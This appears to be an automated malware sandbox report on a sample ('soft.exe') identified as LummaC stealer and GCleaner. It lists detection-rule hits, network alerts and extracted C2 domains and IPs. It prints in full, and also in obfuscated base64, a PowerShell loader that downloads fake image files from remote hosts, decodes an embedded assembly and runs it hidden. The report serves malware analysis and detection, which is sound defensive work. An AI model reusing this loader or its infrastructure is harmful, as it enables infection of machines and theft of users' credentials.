YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@C
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.64.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4600, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49976
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe, ProcessId: 2500, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = 
[Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $en
                            Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp, ParentCommandLine: "C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe", ParentImage: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe, ParentProcessId: 1888, ParentProcessName: N7LnRW81Rfq.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" , ProcessId: 2044, ProcessName: N7LnRW81Rfq.tmp
                            Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67c2163c9db39.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2908, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" , ProcessId: 2352, ProcessName: wscript.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@
QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@C
                            Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 4832, ProcessName: svchost.exe

                            Data Obfuscation

                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = 
New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $en
                            Timestamp                        SID      Severity  Classtype                                      Source IP        Src Port  Destination IP   Dst Port  Protocol
                            2025-03-01T09:48:38.328288+0100  2028371  3         Unknown Traffic                                192.168.2.7      49976     104.21.64.1      443       TCP
                            2025-03-01T09:48:38.977174+0100  2028371  3         Unknown Traffic                                192.168.2.7      49977     104.21.64.1      443       TCP
                            2025-03-01T09:48:41.317114+0100  2028371  3         Unknown Traffic                                192.168.2.7      49978     104.21.64.1      443       TCP
                            2025-03-01T09:48:49.233348+0100  2028371  3         Unknown Traffic                                192.168.2.7      49979     104.21.64.1      443       TCP
                            2025-03-01T09:48:50.472820+0100  2028371  3         Unknown Traffic                                192.168.2.7      49980     104.21.64.1      443       TCP
                            2025-03-01T09:48:51.830375+0100  2028371  3         Unknown Traffic                                192.168.2.7      49981     104.21.64.1      443       TCP
                            2025-03-01T09:48:53.122463+0100  2028371  3         Unknown Traffic                                192.168.2.7      49982     104.21.64.1      443       TCP
                            2025-03-01T09:49:04.316239+0100  2028371  3         Unknown Traffic                                192.168.2.7      49983     104.21.64.1      443       TCP
                            2025-03-01T09:49:13.872893+0100  2028765  3         Unknown Traffic                                192.168.2.7      49984     176.113.115.96   443       TCP
                            2025-03-01T09:49:17.854929+0100  2028765  3         Unknown Traffic                                192.168.2.7      49986     176.113.115.96   443       TCP
                            2025-03-01T09:49:19.220641+0100  2028765  3         Unknown Traffic                                192.168.2.7      49987     176.113.115.96   443       TCP
                            2025-03-01T09:49:20.562194+0100  2028765  3         Unknown Traffic                                192.168.2.7      49989     176.113.115.96   443       TCP
                            2025-03-01T09:49:21.949261+0100  2028765  3         Unknown Traffic                                192.168.2.7      49990     176.113.115.96   443       TCP
                            2025-03-01T09:49:23.210752+0100  2028765  3         Unknown Traffic                                192.168.2.7      49991     176.113.115.96   443       TCP
                            2025-03-01T09:49:24.635917+0100  2028765  3         Unknown Traffic                                192.168.2.7      49992     176.113.115.96   443       TCP
                            2025-03-01T09:49:26.731943+0100  2028765  3         Unknown Traffic                                192.168.2.7      49993     176.113.115.96   443       TCP
                            2025-03-01T09:49:28.452683+0100  2028765  3         Unknown Traffic                                192.168.2.7      49994     176.113.115.96   443       TCP
                            2025-03-01T09:49:29.910014+0100  2028765  3         Unknown Traffic                                192.168.2.7      49995     176.113.115.96   443       TCP
                            2025-03-01T09:48:38.498433+0100  2054653  1         A Network Trojan was detected                  192.168.2.7      49976     104.21.64.1      443       TCP
                            2025-03-01T09:48:40.424468+0100  2054653  1         A Network Trojan was detected                  192.168.2.7      49977     104.21.64.1      443       TCP
                            2025-03-01T09:49:04.785284+0100  2054653  1         A Network Trojan was detected                  192.168.2.7      49983     104.21.64.1      443       TCP
                            2025-03-01T09:48:38.498433+0100  2049836  1         A Network Trojan was detected                  192.168.2.7      49976     104.21.64.1      443       TCP
                            2025-03-01T09:48:29.740274+0100  2049038  1         A Network Trojan was detected                  185.199.108.153  443       192.168.2.7      49974     TCP
                            2025-03-01T09:48:37.769859+0100  2060420  1         Domain Observed Used for C2 Detected           192.168.2.7      60248     1.1.1.1          53        UDP
                            2025-03-01T09:48:48.737395+0100  2048094  1         Malware Command and Control Activity Detected  192.168.2.7      49978     104.21.64.1      443       TCP
                            2025-03-01T09:49:14.336735+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49984     176.113.115.96   443       TCP
                            2025-03-01T09:49:18.298659+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49986     176.113.115.96   443       TCP
                            2025-03-01T09:49:19.652546+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49987     176.113.115.96   443       TCP
                            2025-03-01T09:49:20.996127+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49989     176.113.115.96   443       TCP
                            2025-03-01T09:49:22.380384+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49990     176.113.115.96   443       TCP
                            2025-03-01T09:49:23.641265+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49991     176.113.115.96   443       TCP
                            2025-03-01T09:49:25.811693+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49992     176.113.115.96   443       TCP
                            2025-03-01T09:49:27.171675+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49993     176.113.115.96   443       TCP
                            2025-03-01T09:49:28.883149+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49994     176.113.115.96   443       TCP
                            2025-03-01T09:49:30.335293+0100  2803274  2         Potentially Bad Traffic                        192.168.2.7      49995     176.113.115.96   443       TCP

                            AV Detection

                            Source: https://hardswarehub.today/ | Avira URL Cloud: Label: malware
                            Source: https://hardswarehub.today:443/api | Avira URL Cloud: Label: malware
                            Source: http://185.156.73.73/success?substr=two&s=uniq&sub=non | Avira URL Cloud: Label: malware
                            Source: https://hardswarehub.today/apiLv | Avira URL Cloud: Label: malware
                            Source: https://ofice365.github.io | Avira URL Cloud: Label: malware
                            Source: https://hardswarehub.today/apigQP | Avira URL Cloud: Label: malware
                            Source: hardswarehub.today | Avira URL Cloud: Label: malware
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["starrynsightsky.icu", "hardswarehub.today", "tracnquilforest.life", "hardrwarehaven.run", "seizedsentec.online", "codxefusion.top", "quietswtreams.life"], "Build id": "tqqheo--"}
                            Source: 5.2.soft.exe.9f2c000.3.raw.unpack | Malware Configuration Extractor: GCleaner {"C2 addresses": ["45.91.200.135", "185.156.73.73"]}
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\UNIQ[1].file | ReversingLabs: Detection: 18%
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | ReversingLabs: Detection: 18%
                            Source: soft.exe | Virustotal: Detection: 26%
                            Source: soft.exe | ReversingLabs: Detection: 26%
                            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | String decryptor: starrynsightsky.icu
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | String decryptor: hardswarehub.today
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | String decryptor: tracnquilforest.life
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | String decryptor: hardrwarehaven.run
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | String decryptor: seizedsentec.online
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | String decryptor: codxefusion.top
                            Source: 23.2.MSBuild.exe.400000.0.raw.unpack | String decryptor: quietswtreams.life
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0045D230 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, | 12_2_0045D230
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0045D2E4 ArcFourCrypt, | 12_2_0045D2E4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0045D2FC ArcFourCrypt, | 12_2_0045D2FC
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_10001000 ISCryptGetVersion, | 12_2_10001000
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_10001130 ArcFourCrypt, | 12_2_10001130
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Code function: 14_2_00007FF7444E30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA, | 14_2_00007FF7444E30EC
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 23_2_0041BFAA CryptUnprotectData, | 23_2_0041BFAA

                            Compliance

                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Unpacked PE file: 13.2.ssdtoolbox.exe.400000.0.unpack
                            Source: soft.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SSD ToolBox_is1
                            Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49973 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.7:49974 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49976 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49977 version: TLS 1.2
